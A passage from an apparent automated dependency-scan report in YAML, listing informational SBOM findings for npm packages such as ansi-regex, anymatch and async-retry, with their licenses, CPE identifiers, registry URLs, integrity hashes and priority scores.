type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/agent-base@7.1.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz
|
|
integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 83a9e4994a4bae21
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ansi-regex 5.0.1'
|
|
title: ansi-regex 5.0.1
|
|
description: 'Package discovered: ansi-regex 5.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 434b3315d409487e
|
|
name: ansi-regex
|
|
version: 5.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ansi-regex@5.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz
|
|
integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 55dee429ce8d0ebc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ansi-regex 6.2.2'
|
|
title: ansi-regex 6.2.2
|
|
description: 'Package discovered: ansi-regex 6.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 351fe1b55f0afa57
|
|
name: ansi-regex
|
|
version: 6.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ansi-regex@6.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz
|
|
integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 78d002033ed5f3df
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ansi-styles 4.3.0'
|
|
title: ansi-styles 4.3.0
|
|
description: 'Package discovered: ansi-styles 4.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d7348151a8592cc2
|
|
name: ansi-styles
|
|
version: 4.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ansi-styles@4.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz
|
|
integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==
|
|
dependencies:
|
|
color-convert: ^2.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5a3dc64757afbf1c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ansi-styles 6.2.3'
|
|
title: ansi-styles 6.2.3
|
|
description: 'Package discovered: ansi-styles 6.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b7d3f8e2ee8c8206
|
|
name: ansi-styles
|
|
version: 6.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ansi-styles@6.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz
|
|
integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a0800e7f7f0173c9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: any-promise 1.3.0'
|
|
title: any-promise 1.3.0
|
|
description: 'Package discovered: any-promise 1.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dc69ebae19192ee6
|
|
name: any-promise
|
|
version: 1.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/any-promise@1.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz
|
|
integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4e58783cc9de2b91
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: anymatch 3.1.3'
|
|
title: anymatch 3.1.3
|
|
description: 'Package discovered: anymatch 3.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0f1f6d6adbfca65a
|
|
name: anymatch
|
|
version: 3.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/anymatch@3.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz
|
|
integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==
|
|
dependencies:
|
|
normalize-path: ^3.0.0
|
|
picomatch: ^2.0.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c5e1f2e50730714b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: append-field 1.0.0'
|
|
title: append-field 1.0.0
|
|
description: 'Package discovered: append-field 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 02ed6bf0c016d0d3
|
|
name: append-field
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/append-field@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz
|
|
integrity: sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 413f489faf894e63
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: arg 5.0.2'
|
|
title: arg 5.0.2
|
|
description: 'Package discovered: arg 5.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c190b80836cef557
|
|
name: arg
|
|
version: 5.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/arg@5.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/arg/-/arg-5.0.2.tgz
|
|
integrity: sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0ee2786b2f8f8ad4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: array-flatten 1.1.1'
|
|
title: array-flatten 1.1.1
|
|
description: 'Package discovered: array-flatten 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f61b69e470287928
|
|
name: array-flatten
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/array-flatten@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz
|
|
integrity: sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 374f7e7db72708e5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: arrify 2.0.1'
|
|
title: arrify 2.0.1
|
|
description: 'Package discovered: arrify 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e733388ffa39ebc5
|
|
name: arrify
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/arrify@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz
|
|
integrity: sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e3ccd8258c57c2f8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: async-retry 1.3.3'
|
|
title: async-retry 1.3.3
|
|
description: 'Package discovered: async-retry 1.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3f1747f861c5fded
|
|
name: async-retry
|
|
version: 1.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/async-retry@1.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz
|
|
integrity: sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==
|
|
dependencies:
|
|
retry: 0.13.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c5b9a7358fc490f2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: asynckit 0.4.0'
|
|
title: asynckit 0.4.0
|
|
description: 'Package discovered: asynckit 0.4.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3f371bd1625a90e5
|
|
name: asynckit
|
|
version: 0.4.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
